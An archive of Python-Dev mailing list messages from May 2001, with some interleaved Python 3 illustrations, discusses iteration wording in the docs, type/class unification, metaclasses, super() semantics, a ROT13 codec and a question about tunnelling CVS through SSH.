Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/lib libfuncs.tex,1.76,1.77
In-Reply-To: <E14v35l-0007pQ-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOKJPAA.tim.one@home.com>

[Fred L. Drake]
> Update the filter() and list() descriptions to include information
> about the support for containers and iteration.
> ...
>   \begin{funcdesc}{list}{sequence}
> !   Return a list whose items are the same and in the same order as
> !   \var{sequence}'s items.  \var{sequence} may be either a sequence,
> !   a container that supports iteration, or an iterator object.
> ...

[and similarly for filter()]

Before we repeat this last incantation umpteen more times in the docs, is
this how we want it to read in the end?  The truth of the implementation and
of the design is that "sequence" is any object that supports iteration,
period (if PyObject_GetIter(op) succeeds, list(op) etc are happy, else they
raise TypeError).  "A sequence" and "an iterator object" *always* support
iteration, so naming them too appears to draw a distinction that doesn't
exist.

Suggested alternative:

    \var{sequence} must support iteration (see XXX).

where XXX is common boilerplate explaining what "support iteration" means,
and that sequences and iterator objects are just particular cases of that.
Note that this boilerplate may expand to include generators too before 2.2 is
real, and a generator isn't really "a container that supports iteration" (the
word "container" is a strain in the generator context).  That is, a
long-winded incantation is just going to get longer over time, and if it's
repeated umpteen places in the docs I doubt they'll all get updated when
needed.
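
Tim's point can be checked against modern Python 3, where `list()` and `filter()` accept any object for which `iter()` succeeds. The sketch below uses a hypothetical `Countdown` class that supports iteration only through `__iter__`, plus a generator; neither is "a sequence", and `supports_iteration` is an illustrative stand-in for the `PyObject_GetIter()` test Tim mentions.

```python
def countdown_gen(n):
    # A generator: supports iteration, but is hardly "a container".
    while n > 0:
        yield n
        n -= 1


class Countdown:
    # Hypothetical class that supports iteration via __iter__ only;
    # it has no __len__ or __getitem__, so it is not a sequence.
    def __init__(self, n):
        self.n = n

    def __iter__(self):
        return countdown_gen(self.n)


def supports_iteration(obj):
    """True iff iter(obj) succeeds, which is all list() and filter() need."""
    try:
        iter(obj)
    except TypeError:
        return False
    return True
```

`list(Countdown(3))` and `list(countdown_gen(3))` both give `[3, 2, 1]`, while `list(42)` raises `TypeError` for the same reason `iter(42)` does.
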


From michel at digicool.com  Wed May  2 23:43:42 2001
From: michel at digicool.com (Michel Pelletier)
Date: Wed, 2 May 2001 14:43:42 -0700 (PDT)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105022211.RAA05242@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.LNX.4.32.0105021441060.780-100000@localhost.localdomain>


On Wed, 2 May 2001, Guido van Rossum wrote:

> > o Object
> >     o Class
> >         o MetaClass
> >         o ObjectMetaClass
> >             o ClassMetaClass
> >                 o MetaClassMetaClass
> >
> > Object is the top of the class hierarchy (and total hierarchy).  It has no
> > superclass.  It is the only class that has no superclass.
> > Class is a subclass of Object.
> > MetaClass is a subclass of Class.
> >
> > ObjectMetaClass is also a subclass of Class.
> > ClassMetaClass is a subclass of ObjectMetaClass.
> > MetaClassMetaClass is a subclass of ClassMetaClass.

Does this go on ad infinitum?  I.e., is there a ClassMetaClassMetaClass
which subclasses MetaClassMetaClass and so on?  I was under the impression
from talking to JimF that Smalltalk eventually stopped at a class
that is a subclass of itself.

-Michel


From greg at cosc.canterbury.ac.nz  Thu May  3 03:35:29 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 13:35:29 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AEFCEBD.2E5979C9@lemburg.com>
Message-ID: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal at lemburg.com>:

> I'm not sure I can follow you here: DictType.__repr__ is the
> representation method of the dictionary and not inherited
> from TypeType, so there should be no problem.

The problem is that DictType.__repr__ could mean either
the unbound method for finding the repr of a dictionary,
or the bound method for finding the repr of DictType
itself.

This ambiguity is inherent in the Python language as soon
as you try to make classes into instances (which you have
to do as a consequence of making types into classes).
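
In modern Python 3 (with `dict` in the role of DictType and `type` in the role of TypeType), this ambiguity is resolved by looking special methods up on the *type* of the object: `dict.__repr__` names the method for dictionaries, while `repr(dict)` goes through `type(dict).__repr__`. The sketch below shows this for the built-in case and for a hypothetical user-defined metaclass `Meta` where both levels define `__repr__`.

```python
d = {"a": 1}

# Looking __repr__ up on the class finds the method for its *instances*...
instance_repr = dict.__repr__
# ...whereas repr() of the class itself uses the metaclass's method.
class_repr = type(dict).__repr__


class Meta(type):
    # Used for repr() of classes created by Meta.
    def __repr__(cls):
        return f"<class {cls.__name__} made by Meta>"


class Spam(metaclass=Meta):
    # Used for repr() of Spam instances.
    def __repr__(self):
        return "<a Spam instance>"
```

`Spam.__repr__` is the instance-level method, and only `repr(Spam)` (or `type(Spam).__repr__(Spam)`) reaches the metaclass version.
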

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May  3 05:15:41 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:15:41 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <Pine.LNX.4.32.0105021441060.780-100000@localhost.localdomain>
Message-ID: <200105030315.PAA16465@s454.cosc.canterbury.ac.nz>

Michel Pelletier <michel at digicool.com>:

> I was under the impression
> from talking to JimF that Smalltalk eventually stopped at a class
> that is a subclass of itself.

Some years ago, while playing with Sun's Postscript-based
NeWS window system, I devised an OO language (called P) that 
got translated into PostScript. It had a very Smalltalk-like
class/metaclass system, although rather simpler than what
JimF described. As I remember, the kernel consisted
of a little knot of about 6 classes with some interesting
incestuous relationships between them.

If anyone's interested, I could dig out the code and
provide details of how it all worked. There might be some
ideas that could be used in Python.

(Programming in P felt a lot like programming in Python,
by the way. If my name had been Guido, who knows where it
might have led!)



From greg at cosc.canterbury.ac.nz  Thu May  3 05:25:12 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:25:12 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AEFF710.9471.8025D7EA@localhost>
Message-ID: <200105030325.PAA16469@s454.cosc.canterbury.ac.nz>

Gordon McMillan <gmcm at hypernet.com>:

> I would like to see ... some discussion of the expected 
> pragmatic benefits. (That's a different topic from subclassing 
> types.)

Actually, it's not -- the two issues are connected.

Suppose we succeed in unifying types and classes. Then
instead of classes being of type ClassType, they are
now instances of ClassClass. So classes are also
instances, or in other words, we have unified classes
and instances.

So even if we don't go as far as adding Smalltalk-style
class-methods-via-metaclasses, we still have to deal
with the fact that some things will be both classes
and instances.
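
Python 3 did end up with exactly this arrangement: every class is an instance of `type` (or of a subclass of it), and `type` is an instance of itself, which also stops the infinite regress Michel asked about. A quick check, using a throwaway class `Spam`:

```python
class Spam:
    pass


s = Spam()

# Each entry records one "class is also an instance" relationship.
checks = {
    "instance of its class": isinstance(s, Spam),
    "class is an instance of type": isinstance(Spam, type),
    "class is also an object": isinstance(Spam, object),
    "type is an instance of itself": type(type) is type,
    "type is also a class": issubclass(type, object),
}
```
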



From greg at cosc.canterbury.ac.nz  Thu May  3 05:27:34 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:27:34 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>
Message-ID: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz>

Guido:

> Actually, I think that what's in the __dict__ is just perfect

I was thinking of backwards compatibility for people who
are hacking the __dict__ of a class directly.

If you don't care about that, the problem is simpler.



From greg at cosc.canterbury.ac.nz  Thu May  3 05:39:08 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:39:08 +1200 (NZST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <200105021511.KAA32271@cj20424-a.reston1.va.home.com>
Message-ID: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz>

Guido:

> Will we need to add a "::" operator to Python???

If so, I hope we can find a syntax that doesn't remind
one of C++ so much...

I have an idea! 

How about spelling super(self, MyBaseClass) as

   MyBaseClass[self]

This can be thought of as a sort of "cast" which turns self
into an object which behaves like it were an instance of
MyBaseClass. Then we can write

   MyBaseClass[self].foo(args)

Advantages:
* Concise and uncluttered
* No new syntax needed
* Can be implemented using existing mechanisms
* Doesn't even remotely resemble anything in C++ :-)
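
Greg's "no new syntax needed" claim can be checked with a sketch in modern Python 3: a metaclass `__getitem__` can return a proxy that looks attributes up starting at the named class and binds them to `self`. `CastMeta`, `_Cast`, `Base` and `Derived` are hypothetical names. Note that Python 3.7+ also uses subscription on classes for generic types (`__class_getitem__`), so this spelling would collide with typing usage today, which echoes Peter Funk's `__getitem__` objection in this thread.

```python
class _Cast:
    """Proxy that makes `obj` behave like an instance of `cls` for lookups."""

    def __init__(self, cls, obj):
        self._cls = cls
        self._obj = obj

    def __getattr__(self, name):
        # Search cls and its bases in MRO order, ignoring obj's own class.
        for klass in self._cls.__mro__:
            if name in vars(klass):
                attr = vars(klass)[name]
                # Bind functions (and other descriptors) to the wrapped object.
                if hasattr(type(attr), "__get__"):
                    return attr.__get__(self._obj, self._cls)
                return attr
        raise AttributeError(name)


class CastMeta(type):
    # MyBaseClass[self] is routed here because subscripting a class
    # consults its metaclass's __getitem__.
    def __getitem__(cls, obj):
        return _Cast(cls, obj)


class Base(metaclass=CastMeta):
    def foo(self, arg):
        return f"Base.foo({arg}) on {self.name}"


class Derived(Base):
    def __init__(self, name):
        self.name = name

    def foo(self, arg):
        return "Derived.foo -> " + Base[self].foo(arg)
```

`Derived("d").foo(1)` returns `"Derived.foo -> Base.foo(1) on d"`.
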



From tim.one at home.com  Thu May  3 07:49:04 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 3 May 2001 01:49:04 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AF01381.592AE31B@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>

[MAL, on basemethods]
> ...
> In other words: you let Python continue the search for the method
> as if it hadn't found the occurrence calling the basemethod()
> API. Hmm, still not clear enough... better let Tim jump in here
> (we've had a discussion about basemethod() some months or years
> ago). Tim ?

Sorry, I'm not sure what either of you is talking about.  In

class A(B, C):
    def foo(self):
        super.foo()

Guido said that super would start searching at B, but I don't know what your
"continue the search for the method as if it hadn't found the occurrence
calling the basemethod() API" means:  defining what a thing does in terms of
an unspecified API it doesn't use is a pretty sure recipe for compounded
confusion <wink>.

Given that we're using Python's search rules, the ambiguous point remaining
is whether:

    super.f()

textually contained in a method of class K begins searching with:

    1) K.__bases__

or with:

    2) self.__class__.__bases__

Java uses #1, and Guido's "the search starts with B" implies that he would
too.  But it's unclear whether he meant that.  Given also

class D(A):
    def foo(self):
        super.foo()

D().foo()

both views agree that D.foo() is invoked first, and that D.foo() invokes
A.foo() next.  But under #1 A.foo() invokes B.foo() or C.foo() next, while
under #2 A.foo() invokes A.foo() again.  Multiple inheritance is a red
herring here -- take C out of A's bases, and the same ambiguity needs to be
resolved.
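
Tim's two readings can be compared by hand-coding the lookup. In the sketch below, `find_in_bases` is a hypothetical helper that searches each base left to right (using each base's own attribute lookup). `A`/`D` call it with the textual class's `__bases__` (reading #1), and `A2`/`D2` call it with `type(self).__bases__` (reading #2). A `log` argument makes the call order visible.

```python
def find_in_bases(bases, name):
    """Return the first attribute `name` found among `bases`, searched in order."""
    for base in bases:
        try:
            return getattr(base, name)
        except AttributeError:
            continue
    raise AttributeError(name)


class B:
    def foo(self, log):
        log.append("B.foo")


class C:
    def foo(self, log):
        log.append("C.foo")


# Reading #1: start at the bases of the class that textually contains the call.
class A(B, C):
    def foo(self, log):
        log.append("A.foo")
        find_in_bases(A.__bases__, "foo")(self, log)


class D(A):
    def foo(self, log):
        log.append("D.foo")
        find_in_bases(D.__bases__, "foo")(self, log)


# Reading #2: start at the bases of the instance's class.
class A2(B, C):
    def foo(self, log):
        log.append("A2.foo")
        find_in_bases(type(self).__bases__, "foo")(self, log)


class D2(A2):
    def foo(self, log):
        log.append("D2.foo")
        find_in_bases(type(self).__bases__, "foo")(self, log)
```

Reading #1 logs `D.foo`, `A.foo`, `B.foo`; reading #2 keeps re-entering `A2.foo` until Python raises `RecursionError`. For the record, the `super()` that Python 2.2 eventually introduced takes a third route: `super(K, self)` searches `type(self).__mro__` starting just after K.
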


From greg at cosc.canterbury.ac.nz  Thu May  3 07:56:07 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 17:56:07 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>
Message-ID: <200105030556.RAA16509@s454.cosc.canterbury.ac.nz>

Tim:

> Java uses #1, and Guido's "the search starts with B" implies that he would
> too.  But it's unclear whether he meant that.

It's the only sane thing for him to mean, as far as I can see.



From pf at artcom-gmbh.de  Thu May  3 08:29:03 2001
From: pf at artcom-gmbh.de (Peter Funk)
Date: Thu, 3 May 2001 08:29:03 +0200 (MEST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> from Greg Ewing at "May 3, 2001  3:39: 8 pm"
Message-ID: <m14vCbn-000D2zC@artcom0.artcom-gmbh.de>

Hi,

Greg Ewing:
[...]
> How about spelling super(self, MyBaseClass) as
> 
>    MyBaseClass[self]
> 
> This can be thought of as a sort of "cast" which turns self
> into an object which behaves like it were an instance of
> MyBaseClass. Then we can write
> 
>    MyBaseClass[self].foo(args)
> 
> Advantages:
> * Concise and uncluttered
> * No new syntax needed
> * Can be implemented using existing mechanisms
> * Doesn't even remotely resemble anything in C++ :-)

Disadvantages:
* People will confuse this with calling MyBaseClass.__getitem__(....)
* Doesn't even remotely resemble anything in C++

We have to face it:  I myself don't like C++ either, but a *lot*
of people are already familiar with C++ today.  Giving them
something they are already familiar with will make it easier to
convert some of them to Python.

To Greg: This '::' operator is not all that ugly and, as far as I can see,
would not introduce any backward-incompatible change to the language.
I'm sure C++ has some other real warts to offer that we both don't
want to see in a future version of Python.  Right?

Regards, Peter
-- 
Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260
office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany)


From mal at lemburg.com  Thu May  3 09:49:37 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 09:49:37 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>
Message-ID: <3AF10D91.802C8555@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com>:
> 
> > I'm not sure I can follow you here: DictType.__repr__ is the
> > representation method of the dictionary and not inherited
> > from TypeType, so there should be no problem.
> 
> The problem is that DictType.__repr__ could mean either
> the unbound method for finding the repr of a dictionary,
> or the bound method for finding the repr of DictType
> itself.
> 
> This ambiguity is inherent in the Python language as soon
> as you try to make classes into instances (which you have
> to do as a consequence of making types into classes).

We are actually trying to turn classes into types here :-)

Really, I think that we could resolve this issue by not inheriting
from meta-classes. DictType is a creation of the meta-class
TypeType. I'm not calling these instances to prevent additional
confusion. The root of the problem is that for some reason there
is belief that DictType should implicitly inherit attributes and 
methods from TypeType. If we simply say that there is no implicit
inheritance (only explicit one), then these problems should go
away.

Some of these ideas are buried in the "super" part of this 
thread. Unfortunately this concept doesn't go very far since
Python has multiple inheritance and thus the term "super"
(referring to the class' single base class) is not well-defined.

As Jim mentioned in his reply to Thomas' question, Smalltalk
has two parallel hierarchies. One for the classes and one for
the meta-classes. If we follow the same path in Python and
keep the two well separated, I think we can resolve many of
the issues which are currently showing up.

To link the two hierarchies together we don't need a "super"
concept, but instead a way to reach the meta-class in charge
of a class, say "klass.__creator__". 

Note that there's another issue hiding in all this and again
this is due to multiple inheritance: which meta-class is in
charge of a class which is derived from two classes having
different meta-classes ?

meta1            -->         o klass1
                               o klass1a
                               o klass1b
meta2            -->         o klass2
                               o klass2a
                               o klass2b

class klass3(klass1a, klass2b):
      ...                  

I think there's no clean way to resolve this, so I'd suggest
to simply rule this out and declare it illegal (a class can
only be based on classes having the same meta-class).
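
For comparison, modern Python 3 adopted a relaxed form of this rule: the metaclass of a new class must be a (non-strict) subclass of the metaclasses of all its bases. Unrelated metaclasses like `meta1` and `meta2` are therefore rejected with a `TypeError`, while an explicitly supplied metaclass derived from both is accepted. The sketch reuses the names from the diagram; `meta3` and `try_klass3` are hypothetical additions.

```python
class meta1(type):
    pass


class meta2(type):
    pass


class klass1(metaclass=meta1):
    pass


class klass1a(klass1):
    pass


class klass2(metaclass=meta2):
    pass


class klass2b(klass2):
    pass


def try_klass3():
    """Attempt the diagram's klass3; return the error message, or None on success."""
    try:
        class klass3(klass1a, klass2b):
            pass
    except TypeError as exc:
        return str(exc)
    return None


# Supplying a metaclass that derives from both resolves the conflict.
class meta3(meta1, meta2):
    pass


class klass3(klass1a, klass2b, metaclass=meta3):
    pass
```
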

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From barry at digicool.com  Thu May  3 10:24:16 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 3 May 2001 04:24:16 -0400
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com>
	<200105021918.OAA03080@cj20424-a.reston1.va.home.com>
	<3AF052CE.E928BDA1@lemburg.com>
	<200105021938.OAA03550@cj20424-a.reston1.va.home.com>
	<3AF0662D.48671B4E@lemburg.com>
	<3AF06FCE.854D4DF7@lemburg.com>
Message-ID: <15089.5552.164307.344721@anthem.wooz.org>

>>>>> "M" == M  <mal at lemburg.com> writes:

    M> Here's a little fun codec to play with. It encodes the input
    M> using the ROT13 encoding (which is 1-1 and its own inverse).

LOL!  Guess what `language' I chose to use when testing Mailman's i18n
support?  :)

-Barry


From fredrik at pythonware.com  Thu May  3 10:11:10 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Thu, 3 May 2001 10:11:10 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  	            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com>
Message-ID: <028a01c0d3a8$9e05f190$e46940d5@hagrid>

mal wrote:
 
> Here's some sample output (Netscape can unscramble this BTW):

heh.  just discovered that outlook express can deal with this
too -- but only if the message comes from the usenet.

on ordinary mail, the "unscramble rot13" menu entry is disabled
(too much usability testing?)

maybe you could repost your secret message to comp.lang.python ;-)

Cheers /F


From mal at lemburg.com  Thu May  3 11:05:41 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 11:05:41 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  	            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> <028a01c0d3a8$9e05f190$e46940d5@hagrid>
Message-ID: <3AF11F65.5CBF508C@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > Here's some sample output (Netscape can unscramble this BTW):
> 
> heh.  just discovered that outlook express can deal with this
> too -- but only if the message comes from the usenet.
> 
> on ordinary mail, the "unscramble rot13" menu entry is disabled
> (too much usability testing?)
> 
> maybe you could repost your secret message to comp.lang.python ;-)

It wasn't all that secret: I simply cut&pasted the first
two paragraphs of the message through the codec.

There was also an inaccuracy in the posting: the codec still
produces Unicode (by virtue of using the charmap codec as
basis). 

Still, it serves as a nice example of what str.decode()
and str.encode() can be used for and also demonstrates how
easy it is to install new codecs.
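
As a rough modern-Python-3 analogue of installing a new codec, the sketch below registers a ROT13 text transform with `codecs.register()`. The codec name `rot13demo` and the helper names are hypothetical. Because this codec maps `str` to `str`, it has to be used through `codecs.encode()`/`codecs.decode()`; Python 3's `str.encode()` insists on producing bytes.

```python
import codecs

_PLAIN = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
_ROTATED = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm"
_TABLE = str.maketrans(_PLAIN, _ROTATED)


def _rot13(text, errors="strict"):
    # Codec functions return (output, number of input items consumed).
    return text.translate(_TABLE), len(text)


def _search(name):
    # Search functions receive the normalized (lower-case) encoding name
    # and return a CodecInfo, or None if they don't know the codec.
    if name == "rot13demo":
        return codecs.CodecInfo(_rot13, _rot13, name="rot13demo")
    return None


codecs.register(_search)
```

`codecs.encode("Hello", "rot13demo")` gives `"Uryyb"`, and applying the transform twice returns the original text, since ROT13 is its own inverse.
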

I think I'll repost it to c.l.p though -- with a new secret 
attached to it ;-)



From guido at digicool.com  Thu May  3 16:26:22 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 09:26:22 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Thu, 03 May 2001 09:49:37 +0200."
             <3AF10D91.802C8555@lemburg.com> 
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>  
            <3AF10D91.802C8555@lemburg.com> 
Message-ID: <200105031426.JAA07372@cj20424-a.reston1.va.home.com>

> We are actually trying to turn classes into types here :-)

Yes!  Wait till you see my next batch of checkins. :-)

> Really, I think that we could resolve this issue by not inheriting
> from meta-classes. DictType is a creation of the meta-class
> TypeType. I'm not calling these instances to prevent additional
> confusion. The root of the problem is that for some reason there
> is belief that DictType should implicitly inherit attributes and 
> methods from TypeType. If we simply say that there is no implicit
> inheritance (only explicit one), then these problems should go
> away.

Sorry, you still seem to be confused about this.  As I tried to
explain before, DictType does not *inherit* from TypeType, but it is
an *instance* of TypeType.  TypeType defines a __repr__() method for
all its instances.  This is needed so that repr(DictType) returns
"<type 'DictType'>".  It is *not* inherited from TypeType!

If DictType were to inherit from something, it would inherit from the
(not yet existing) ObjectType.  ObjectType would have a __repr__
method too: it returns "<foo object at 0x......>".

But this method is overridden by DictType, so doesn't come into play.

Requiring explicit inheritance (whatever that may be) won't fix the
problem.
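
The instance-of versus inherits-from distinction can be checked in modern Python 3, where `object` eventually filled the role of the "not yet existing" ObjectType and `type` that of TypeType. A small sketch:

```python
import re

d = {}

# Inheritance: dict's method resolution order contains object, not type.
inherits_from = dict.__mro__
# Instantiation: dict is an *instance* of type.
metaclass = type(dict)

# object's generic __repr__ still exists, but dict overrides it.
generic = object.__repr__(d)
```

`generic` looks like `<dict object at 0x...>`, while `repr(d)` uses dict's own override and `repr(dict)` uses the metaclass's method.
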

> Some of these ideas are buried in the "super" part of this 
> thread. Unfortunately this concept doesn't go very far since
> Python has multiple inheritance and thus the term "super"
> (referring to the class' single base class) is not well-defined.

Not true.  While super can't always refer to a single class, the use
of super can be completely well-defined in an unambiguous way.  Given

  class D(A, B, C):
    def foo(self):
      super.foo(self)

"super.foo" is whatever would be called in D1 if we changed the class
hierarchy as follows:

  class D1(A, B, C): pass
  class D(D1):
    def foo(self):
      D1.foo(self)
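
This definition can be checked against the `super()` that later shipped in Python, for the case described here, where `self` is an instance of D itself. In the sketch below A deliberately lacks `foo`, so both spellings have to fall through to B; the class names follow the example and the method bodies are hypothetical.

```python
class A:
    pass  # no foo here, so the search must continue to B


class B:
    def foo(self):
        return "B.foo"


class C:
    def foo(self):
        return "C.foo"


class D1(A, B, C):
    pass


class D(A, B, C):
    def foo(self):
        # Modern spelling of "super.foo(self)".
        return "D.foo -> " + super().foo()


d = D()
# The function super() finds starting from D is the one D1 would find.
via_super = super(D, d).foo.__func__
via_d1 = D1.foo
```

The equivalence holds exactly for a plain D instance; once D is itself combined with other classes through multiple inheritance, modern `super()` follows the instance's MRO and can reach a class that D1 would never consult.
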

The problem with super is not that it isn't well-defined.  Its problem
is that it's not enough to do what you want.  In some situations
involving multiple inheritance, it can be essential to be able to
"merge" methods of the same name defined in each of the base classes,
e.g.

  class C(A, B):
    def save(self):
      A.save(self)
      B.save(self)

So we can't use super as an argument to abandon explicitly naming the
base class of base methods.  Out of the proposed spellings that I can
remember:

      B.save(self)			# current Python
      B.__dict__['save'](self)		# ditto, butt ugly
      B::save(self)			# C++
      B._.save(self)			# Don Beaudry
      B.instanceMethods.save(self)	# ???

I still like current Python best!
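
The `save` example runs as written once A and B are given bodies. The sketch below (with hypothetical bodies that just record the call) also shows that the `B.__dict__['save'](self)` spelling only works when B defines `save` itself rather than inheriting it; `B2` and `dict_spelling_works` are illustrative additions.

```python
class A:
    def save(self):
        self.saved.append("A")


class B:
    def save(self):
        self.saved.append("B")


class C(A, B):
    def __init__(self):
        self.saved = []

    def save(self):
        # Explicitly "merge" both base implementations, in a chosen order.
        A.save(self)
        B.save(self)


class B2(B):
    pass  # inherits save from B, so "save" is not in B2.__dict__


def dict_spelling_works(cls, obj):
    """Try cls.__dict__['save'](obj); return False if cls has no save of its own."""
    try:
        cls.__dict__["save"](obj)
    except KeyError:
        return False
    return True
```
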

> As Jim mentioned in his reply to Thomas' question, Smalltalk
> has two parallel hierarchies. One for the classes and one for
> the meta-classes. If we follow the same path in Python and
> keep the two well separated, I think we can resolve many of
> the issues which are currently showing up.

Yeah, but this is not the path that Python has already taken (and
which has been beaten further by Jim Fulton's ExtensionClasses).
Python's path is "turtles all the way down".  See also my old
head-exploding metaclasses paper.

> To link the two hierarchies together we don't need a "super"
> concept, but instead a way to reach the meta-class in charge
> of a class, say "klass.__creator__". 

Your confusion between the "isInstanceOf" and "isInheritedFrom"
relationships seems really deep!  Super relates to inheritance.
Metaclasses relate to instantiation (of the class, as an instance of
the metaclass).

> Note that there's another issue hiding in all this and again
> this is due to multiple inheritance: which meta-class is in
> charge of a class which is derived from two classes having
> different meta-classes ?
> 
> meta1            -->         o klass1
>                                o klass1a
>                                o klass1b
> meta2            -->         o klass2
>                                o klass2a
>                                o klass2b
> 
> class klass3(klass1a, klass2b):
>       ...                  
> 
> I think there's no clean way to resolve this, so I'd suggest
> to simply rule this out and declare it illegal (a class can
> only be based on classes having the same meta-class).

Unfortunately, again thanks to Jim Fulton, we can't rule this out,
because this is actually used by ExtensionClasses.  The rule (as I
interpret it) gives the first base class control; if the first base
class is a standard class, it checks whether any of the other base classes
are not standard classes, and if so, gives control to the first such
base class.  Another way to say this is that the first base class that
has a non-standard metaclass gets control.

(ExtensionClasses implements an additional rule where it requires all
except one of the base classes to define no instance variables.  This
is an example of the importance of metaclasses done right: the
metaclass has control over such issues.  I don't think that
Smalltalk's metaclasses have this much control -- you pretty much have
a 1-1 correspondence between class and metaclass.)
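
The ExtensionClasses rule as stated here ("the first base class that has a non-standard metaclass gets control") can be written down as a small function. This is a hypothetical sketch of the rule as described, with `type` standing in for the standard class metaclass; it is not ExtensionClass's actual code, and `Meta`, `Plain` and `Special` are illustrative names.

```python
def controlling_metaclass(bases, standard=type):
    """Return the metaclass of the first base whose metaclass is non-standard.

    Falls back to `standard` when every base uses the standard metaclass.
    """
    for base in bases:
        meta = type(base)
        if meta is not standard:
            return meta
    return standard


class Meta(type):
    pass


class Plain:
    pass


class Special(metaclass=Meta):
    pass
```
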

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May  3 16:28:03 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 09:28:03 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Thu, 03 May 2001 15:27:34 +1200."
             <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> 
References: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> 
Message-ID: <200105031428.JAA07405@cj20424-a.reston1.va.home.com>

> Guido:
> 
> > Actually, I think that what's in the __dict__ is just perfect
> 
> I was thinking of backwards compatibility for people who
> are hacking the __dict__ of a class directly.

Depending on how they hack it, it may still work.

> If you don't care about that, the problem is simpler.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Thu May  3 16:26:51 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 3 May 2001 09:26:51 -0500
Subject: [Python-Dev] OT: CVS access through firewall via SSH
Message-ID: <15089.27307.136251.862692@beluga.mojam.com>

Python-dev folks,

Sorry for the off-topic post, but I'm striking out on the various other
sources I've located so far.  Since this group seemed to have a love-hate
relationship with CVS for a while, I thought maybe someone here would be able
to steer me in the right direction.

I have to access a CVS repository through a firewall via SSH.  That is, to
get to "server" I have to tunnel through "firewall" using SSH to port "nnn".
Using SSH to establish an interactive session to server is no problem:

    ssh -p nnn firewall

When I'm inside the firewall, I use a CVSROOT that looks like

    :pserver:montanaro at server:/cvs/projects

I need to merge the two bits somehow to come up with a CVSROOT that will do
the tunnel automagically.  I've tried this:

    :pserver:montanaro at firewall:nnn/cvs/projects

but CVS complains

    cvs [update aborted]: connect to firewall:2401 failed: Connection refused

(port 2401 is the normal CVS port).

Any suggestions or pointers?

Thanks,

Skip


